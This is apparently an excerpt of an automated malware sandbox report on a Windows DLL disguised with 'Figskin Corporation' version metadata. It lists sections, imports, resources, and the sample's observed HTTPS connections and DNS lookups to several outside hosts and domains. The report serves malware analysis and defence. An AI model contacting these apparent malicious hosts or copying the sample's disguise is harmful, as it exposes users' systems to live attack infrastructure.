.rsrc	0x63000	0xf80	0x1000	False	0.371826171875	data	3.49422984211	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x64000	0x1f06	0x2000	False	0.472290039062	data	4.57666635881	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0x63588	0xcc	data	English	United States
RT_DIALOG	0x63658	0xc0	data	English	United States
RT_DIALOG	0x63718	0xbc	data	English	United States
RT_DIALOG	0x637d8	0x148	data	English	United States
RT_DIALOG	0x63920	0xd0	data	English	United States
RT_DIALOG	0x639f0	0x140	data	English	United States
RT_DIALOG	0x63b30	0xc8	data	English	United States
RT_DIALOG	0x63bf8	0x142	data	English	United States
RT_DIALOG	0x63d40	0xbc	data	English	United States
RT_VERSION	0x63270	0x318	data	English	United States
RT_MANIFEST	0x63e00	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	LCMapStringW, VirtualProtect, GetStringTypeA, HeapReAlloc, GetStringTypeW, GetCurrentThreadId, GetLocaleInfoA, HeapSize, LoadLibraryA, InitializeCriticalSection, CompareStringA, CompareStringW, GetVersion, WriteFile, FindFirstChangeNotificationA, GetDiskFreeSpaceA, RemoveDirectoryA, CreateProcessA, CreateEventA, LCMapStringA, Sleep, GetSystemTimeAsFileTime, GetCommandLineA, HeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, GetProcAddress, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, MultiByteToWideChar, GetTimeFormatA, GetDateFormatA, WideCharToMultiByte, GetTimeZoneInformation, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, SetEnvironmentVariableA
USER32.dll	GetMessageA, CloseClipboard, GetClassNameA, MapDialogRect, LoadIconA, SetParent, ExitWindowsEx, GetDC, InflateRect, OffsetRect, GetWindowTextA, GetAsyncKeyState, IntersectRect, EndDialog, EnumChildWindows, UpdateWindow, FindWindowA, EndDeferWindowPos, GetMessagePos
GDI32.dll	SetTextColor, SetBkColor, SetAbortProc, CreateBitmap, SetRectRgn, CombineRgn, StretchDIBits, GetClipBox, GetTextMetricsA, AbortDoc, EndDoc
COMDLG32.dll	CommDlgExtendedError, GetOpenFileNameA, GetSaveFileNameA, GetFileTitleA, ChooseFontA, ReplaceTextA
COMCTL32.dll	ImageList_Remove, InitCommonControlsEx, ImageList_SetBkColor, ImageList_SetIconSize, ImageList_Destroy, ImageList_SetDragCursorImage

Version Infos

Description	Data
LegalCopyright	Figskin Corporation. All rights reserved
InternalName	Pound Bit
FileVersion	8.3.0.634
CompanyName	Figskin Corporation
ProductName	Figskin Scienceland
ProductVersion	8.3.0.634
FileDescription	Figskin Scienceland
OriginalFilename	hole.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2020 18:00:44.319030046 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:44.445207119 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:44.445550919 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:44.496025085 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:44.623572111 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:44.623622894 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:44.623661041 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:44.623702049 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:44.623739958 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:44.623748064 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:44.623790026 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:44.623796940 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:44.623801947 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:44.740991116 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:44.867456913 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:44.867938042 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:44.900187969 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:45.065598965 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:45.370954037 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:45.370989084 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:45.371026039 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:45.371112108 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:45.371161938 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:45.371515036 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:45.371678114 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:45.498420954 CET	443	49735	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:45.498591900 CET	49735	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:45.621951103 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:45.748013020 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:45.748150110 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:45.748992920 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:45.874871969 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:45.876118898 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:45.876140118 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:45.876154900 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:45.876168966 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:45.876434088 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:45.903753996 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:46.030296087 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:46.030777931 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:46.032215118 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:46.197670937 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:46.478622913 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:46.478667974 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:46.478696108 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:46.478775024 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:46.478825092 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:46.478832006 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:46.478863001 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:46.478935957 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:46.591269016 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:46.604706049 CET	443	49736	70.32.23.56	192.168.2.3
Dec 13, 2020 18:00:46.604835033 CET	49736	443	192.168.2.3	70.32.23.56
Dec 13, 2020 18:00:46.718322039 CET	443	49737	67.23.227.19	192.168.2.3
Dec 13, 2020 18:00:46.718473911 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:46.726059914 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:46.853110075 CET	443	49737	67.23.227.19	192.168.2.3
Dec 13, 2020 18:00:46.854614973 CET	443	49737	67.23.227.19	192.168.2.3
Dec 13, 2020 18:00:46.854670048 CET	443	49737	67.23.227.19	192.168.2.3
Dec 13, 2020 18:00:46.854700089 CET	443	49737	67.23.227.19	192.168.2.3
Dec 13, 2020 18:00:46.854820967 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:46.854866028 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:46.869280100 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:46.996562004 CET	443	49737	67.23.227.19	192.168.2.3
Dec 13, 2020 18:00:46.996750116 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:46.997703075 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:47.164597034 CET	443	49737	67.23.227.19	192.168.2.3
Dec 13, 2020 18:00:47.503226995 CET	443	49737	67.23.227.19	192.168.2.3
Dec 13, 2020 18:00:47.503273010 CET	443	49737	67.23.227.19	192.168.2.3
Dec 13, 2020 18:00:47.503510952 CET	443	49737	67.23.227.19	192.168.2.3
Dec 13, 2020 18:00:47.503592014 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:47.503647089 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:47.503796101 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:47.503871918 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:47.630857944 CET	443	49737	67.23.227.19	192.168.2.3
Dec 13, 2020 18:00:47.631016016 CET	49737	443	192.168.2.3	67.23.227.19
Dec 13, 2020 18:00:47.727953911 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:47.886188030 CET	443	49738	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:47.887159109 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:47.889065981 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.047314882 CET	443	49738	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.050368071 CET	443	49738	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.050420046 CET	443	49738	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.050462008 CET	443	49738	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.050683022 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.077200890 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.236044884 CET	443	49738	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.236316919 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.237912893 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.406014919 CET	443	49738	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.406060934 CET	443	49738	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.406089067 CET	443	49738	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.406157017 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.406202078 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.406461000 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.406522989 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.424137115 CET	49739	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.564574957 CET	443	49738	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.564666986 CET	49738	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.582658052 CET	443	49739	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.583090067 CET	49739	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.585036039 CET	49739	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.743344069 CET	443	49739	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.744342089 CET	443	49739	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.744731903 CET	49739	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.746367931 CET	49739	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.752048016 CET	49739	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.910275936 CET	443	49739	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.911765099 CET	443	49739	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.911808968 CET	443	49739	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.911845922 CET	443	49739	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:48.911978960 CET	49739	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.912209988 CET	49739	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.912220001 CET	49739	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:48.912273884 CET	49739	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:49.070395947 CET	443	49739	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:49.070718050 CET	49739	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:53.952779055 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.111593962 CET	443	49740	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.111855030 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.113396883 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.271718979 CET	443	49740	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.272578001 CET	443	49740	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.272953987 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.273842096 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.282253027 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.440445900 CET	443	49740	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.441414118 CET	443	49740	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.441504002 CET	443	49740	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.441540003 CET	443	49740	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.441574097 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.441620111 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.441644907 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.445277929 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.445347071 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.461735964 CET	49741	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.603430033 CET	443	49740	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.603579044 CET	49740	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.619926929 CET	443	49741	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.620250940 CET	49741	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.621484995 CET	49741	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.779807091 CET	443	49741	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.780786991 CET	443	49741	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.781174898 CET	49741	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.782192945 CET	49741	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.790869951 CET	49741	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.949866056 CET	443	49741	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.949913025 CET	443	49741	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.949944019 CET	443	49741	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.949970961 CET	443	49741	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:54.950103998 CET	49741	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.950295925 CET	49741	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:54.950344086 CET	49741	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:55.108602047 CET	443	49741	192.254.225.195	192.168.2.3
Dec 13, 2020 18:00:55.108694077 CET	49741	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:00:59.977149010 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.135431051 CET	443	49745	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.135612011 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.136142015 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.294271946 CET	443	49745	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.294998884 CET	443	49745	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.295094967 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.295562029 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.298856974 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.456998110 CET	443	49745	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.457943916 CET	443	49745	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.457986116 CET	443	49745	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.458015919 CET	443	49745	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.458028078 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.458060980 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.458072901 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.458240986 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.458268881 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.480321884 CET	49746	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.616193056 CET	443	49745	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.616267920 CET	49745	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.638550043 CET	443	49746	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.638693094 CET	49746	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.640244007 CET	49746	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.798544884 CET	443	49746	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.799644947 CET	443	49746	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.799737930 CET	49746	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.800244093 CET	49746	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.803415060 CET	49746	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.961519003 CET	443	49746	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.962676048 CET	443	49746	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.962716103 CET	443	49746	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.962735891 CET	443	49746	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:00.962954998 CET	49746	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.965032101 CET	49746	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:00.965080976 CET	49746	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:01.102607965 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.124522924 CET	443	49746	192.254.225.195	192.168.2.3
Dec 13, 2020 18:01:01.124666929 CET	49746	443	192.168.2.3	192.254.225.195
Dec 13, 2020 18:01:01.213779926 CET	443	49747	192.3.183.226	192.168.2.3
Dec 13, 2020 18:01:01.213942051 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.214698076 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.325511932 CET	443	49747	192.3.183.226	192.168.2.3
Dec 13, 2020 18:01:01.329196930 CET	443	49747	192.3.183.226	192.168.2.3
Dec 13, 2020 18:01:01.329252005 CET	443	49747	192.3.183.226	192.168.2.3
Dec 13, 2020 18:01:01.329282999 CET	443	49747	192.3.183.226	192.168.2.3
Dec 13, 2020 18:01:01.338480949 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.352591991 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.463763952 CET	443	49747	192.3.183.226	192.168.2.3
Dec 13, 2020 18:01:01.466237068 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.466941118 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.617110014 CET	443	49747	192.3.183.226	192.168.2.3
Dec 13, 2020 18:01:01.881920099 CET	443	49747	192.3.183.226	192.168.2.3
Dec 13, 2020 18:01:01.881963968 CET	443	49747	192.3.183.226	192.168.2.3
Dec 13, 2020 18:01:01.881990910 CET	443	49747	192.3.183.226	192.168.2.3
Dec 13, 2020 18:01:01.882091045 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.882143974 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.882150888 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.882206917 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.882246017 CET	49747	443	192.168.2.3	192.3.183.226
Dec 13, 2020 18:01:01.992804050 CET	443	49747	192.3.183.226	192.168.2.3
Dec 13, 2020 18:01:01.992975950 CET	49747	443	192.168.2.3	192.3.183.226

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2020 17:59:52.110733032 CET	53195	53	192.168.2.3	8.8.8.8
Dec 13, 2020 17:59:52.134998083 CET	53	53195	8.8.8.8	192.168.2.3
Dec 13, 2020 17:59:53.136502028 CET	50141	53	192.168.2.3	8.8.8.8
Dec 13, 2020 17:59:53.161084890 CET	53	50141	8.8.8.8	192.168.2.3
Dec 13, 2020 17:59:53.969039917 CET	53023	53	192.168.2.3	8.8.8.8
Dec 13, 2020 17:59:53.996448040 CET	53	53023	8.8.8.8	192.168.2.3
Dec 13, 2020 17:59:54.775568962 CET	49563	53	192.168.2.3	8.8.8.8
Dec 13, 2020 17:59:54.799938917 CET	53	49563	8.8.8.8	192.168.2.3
Dec 13, 2020 17:59:55.968637943 CET	51352	53	192.168.2.3	8.8.8.8
Dec 13, 2020 17:59:55.995690107 CET	53	51352	8.8.8.8	192.168.2.3
Dec 13, 2020 17:59:57.135420084 CET	59349	53	192.168.2.3	8.8.8.8
Dec 13, 2020 17:59:57.159847021 CET	53	59349	8.8.8.8	192.168.2.3
Dec 13, 2020 17:59:57.871728897 CET	57084	53	192.168.2.3	8.8.8.8
Dec 13, 2020 17:59:57.899000883 CET	53	57084	8.8.8.8	192.168.2.3
Dec 13, 2020 17:59:58.493649006 CET	58823	53	192.168.2.3	8.8.8.8
Dec 13, 2020 17:59:58.518022060 CET	53	58823	8.8.8.8	192.168.2.3
Dec 13, 2020 17:59:59.518012047 CET	57568	53	192.168.2.3	8.8.8.8
Dec 13, 2020 17:59:59.545289993 CET	53	57568	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:00.191864014 CET	50540	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:00.216548920 CET	53	50540	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:01.227436066 CET	54366	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:01.254662991 CET	53	54366	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:02.154442072 CET	53034	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:02.181777000 CET	53	53034	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:22.572859049 CET	57762	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:22.597362995 CET	53	57762	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:26.736121893 CET	55435	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:26.781519890 CET	53	55435	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:42.112818003 CET	50713	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:42.137171984 CET	53	50713	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:42.501646996 CET	56132	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:42.545161009 CET	53	56132	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:44.156333923 CET	58987	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:44.293592930 CET	53	58987	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:45.447274923 CET	56579	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:45.616791964 CET	53	56579	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:46.527847052 CET	60633	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:46.587399006 CET	53	60633	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:47.556493998 CET	61292	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:47.724914074 CET	53	61292	8.8.8.8	192.168.2.3
Dec 13, 2020 18:00:58.139362097 CET	63619	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:00:58.166681051 CET	53	63619	8.8.8.8	192.168.2.3
Dec 13, 2020 18:01:01.057795048 CET	64938	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:01:01.100646019 CET	53	64938	8.8.8.8	192.168.2.3
Dec 13, 2020 18:01:01.960922956 CET	61946	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:01:02.051309109 CET	53	61946	8.8.8.8	192.168.2.3
Dec 13, 2020 18:01:02.058600903 CET	64910	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:01:02.094324112 CET	53	64910	8.8.8.8	192.168.2.3
Dec 13, 2020 18:01:02.180860043 CET	52123	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:01:02.218029976 CET	53	52123	8.8.8.8	192.168.2.3
Dec 13, 2020 18:01:07.111082077 CET	56130	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:01:07.152836084 CET	53	56130	8.8.8.8	192.168.2.3
Dec 13, 2020 18:01:07.160408020 CET	56338	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:01:07.193361044 CET	53	56338	8.8.8.8	192.168.2.3
Dec 13, 2020 18:01:12.204451084 CET	59420	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:01:12.287242889 CET	53	59420	8.8.8.8	192.168.2.3
Dec 13, 2020 18:01:12.304409027 CET	58784	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:01:12.339963913 CET	53	58784	8.8.8.8	192.168.2.3
Dec 13, 2020 18:01:32.026865005 CET	63978	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:01:32.051188946 CET	53	63978	8.8.8.8	192.168.2.3
Dec 13, 2020 18:01:33.656912088 CET	62938	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:01:33.697693110 CET	53	62938	8.8.8.8	192.168.2.3
Dec 13, 2020 18:02:43.275849104 CET	55708	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:02:43.308525085 CET	53	55708	8.8.8.8	192.168.2.3
Dec 13, 2020 18:02:43.803208113 CET	56803	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:02:43.836067915 CET	53	56803	8.8.8.8	192.168.2.3
Dec 13, 2020 18:02:44.467400074 CET	57145	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:02:44.500171900 CET	53	57145	8.8.8.8	192.168.2.3
Dec 13, 2020 18:02:44.832010031 CET	55359	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:02:44.856794119 CET	53	55359	8.8.8.8	192.168.2.3
Dec 13, 2020 18:02:45.364487886 CET	58306	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:02:45.399610996 CET	53	58306	8.8.8.8	192.168.2.3
Dec 13, 2020 18:02:45.700702906 CET	64124	53	192.168.2.3	8.8.8.8
Dec 13, 2020 18:02:45.728238106 CET	53	64124	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 13, 2020 18:00:44.156333923 CET	192.168.2.3	8.8.8.8	0xca7c	Standard query (0)	www.businessinsurancelaw.com	A (IP address)	IN (0x0001)
Dec 13, 2020 18:00:45.447274923 CET	192.168.2.3	8.8.8.8	0xd7d3	Standard query (0)	squire.ae	A (IP address)	IN (0x0001)
Dec 13, 2020 18:00:46.527847052 CET	192.168.2.3	8.8.8.8	0xa2f1	Standard query (0)	lamun.pk	A (IP address)	IN (0x0001)
